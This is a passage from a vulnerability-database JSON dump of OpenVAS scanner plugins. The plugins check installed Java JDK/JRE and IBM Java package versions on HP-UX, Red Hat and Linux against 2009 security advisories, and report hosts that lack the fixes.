ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", 
rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1647.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. 
All running instances\nof IBM Java must be restarted for this update to take effect.", "modified": "2018-04-06T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:136141256231066471", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066471", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1647", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1647.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1647 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1647.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. 
(CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running instances\nof IBM Java must be restarted for this update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66471\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1647\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1647.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != 
NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-accessibility\", rpm:\"java-1.5.0-ibm-accessibility~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1647.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. 
These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running instances\nof IBM Java must be restarted for this update to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:66471", "href": "http://plugins.openvas.org/nasl.php?oid=66471", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1647", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1647.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1647 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1647.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running instances\nof IBM Java must be restarted for this update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. 
To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(66471);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1647\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1647.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += 
res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-accessibility\", rpm:\"java-1.5.0-ibm-accessibility~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") 
{\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-13T12:59:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "This host is installed with Sun Java JDK/JRE and is prone to\n multiple vulnerabilities.", "modified": "2017-11-08T00:00:00", "published": "2009-11-13T00:00:00", "id": "OPENVAS:800975", "href": "http://plugins.openvas.org/nasl.php?oid=800975", "type": "openvas", "title": "Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_sun_java_jre_mult_vuln_nov09_lin.nasl 7699 2017-11-08 12:10:34Z santu $\n#\n# Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (LinUx)\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation allows remote attacker to execute arbitrary code,\n gain escalated privileges, bypass security restrictions and cause denial\n of service attacks inside the context of the affected system.\n Impact Level: System/Application.\";\ntag_affected = \"Sun Java JDK/JRE 6 prior to 6 Update 17\n Sun Java JDK/JRE 5 prior to 5 Update 22\n Sun Java JDK/JRE 1.4.x prior to 1.4.2_24\n Sun Java JDK/JRE 1.3.x prior to 1.3.1_27 on Linux.\";\ntag_insight = \"Multiple flaws occur due to,\n - Error when decoding 'DER' encoded data and parsing HTTP headers.\n - Error when verifying 'HMAC' digests.\n - Integer overflow error in the 'JPEG JFIF' Decoder while processing\n malicious image files.\n - A buffer overflow error in the 'setDiffICM()' and 'setBytePixels()'\n functions in the Abstract Window Toolkit (AWT).\n - Unspecified error due to improper parsing of color profiles of images.\n - A buffer overflow error due to improper implementation of the\n 'HsbParser.getSoundBank()' function.\n - Three unspecified errors when processing audio or image files.\";\ntag_solution = \"Upgrade to JDK/JRE version 6 Update 17 or later,\n http://java.sun.com/javase/downloads/index.jsp\n OR\n Upgrade to JDK/JRE version 5 Update 22\n http://java.sun.com/javase/downloads/index_jdk5.jsp\n OR\n Upgrade to JDK/JRE version 1.4.2_24\n http://java.sun.com/j2se/1.4.2/download.html\n OR\n Upgrade to JDK/JRE version 1.3.1_27\n http://java.sun.com/j2se/1.3/download.html\";\ntag_summary = \"This host is installed with Sun Java JDK/JRE and is prone to\n multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(800975);\n 
script_version(\"$Revision: 7699 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-08 13:10:34 +0100 (Wed, 08 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-13 15:48:12 +0100 (Fri, 13 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3877\", \"CVE-2009-3876\", \"CVE-2009-3875\", \"CVE-2009-3873\",\n \"CVE-2009-3874\", \"CVE-2009-3872\", \"CVE-2009-3871\", \"CVE-2009-3869\",\n \"CVE-2009-3868\", \"CVE-2009-3867\");\n script_bugtraq_id(36881);\n script_name(\"Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Linux)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/37231\");\n script_xref(name : \"URL\" , value : \"http://java.sun.com/javase/6/webnotes/6u17.html\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/3131\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_lin.nasl\");\n script_require_keys(\"Sun/Java/JRE/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\njreVer = get_kb_item(\"Sun/Java/JRE/Linux/Ver\");\nif(!jreVer){\n exit(0);\n}\n\nif(jreVer)\n{\n # Check for 1.3 < 1.3.1_27, 1.4 < 1.4.2_24, 1.5 < 1.5.0_22 (5 Update 22),\n # and 1.6 < 1.6.0_17 (6 Update 17)\n if(version_in_range(version:jreVer, test_version:\"1.3\", test_version2:\"1.3.1.26\")||\n version_in_range(version:jreVer, 
test_version:\"1.4\", test_version2:\"1.4.2.23\")||\n version_in_range(version:jreVer, test_version:\"1.5\", test_version2:\"1.5.0.21\")||\n version_in_range(version:jreVer, test_version:\"1.6\", test_version2:\"1.6.0.16\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1643.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All running\ninstances of IBM 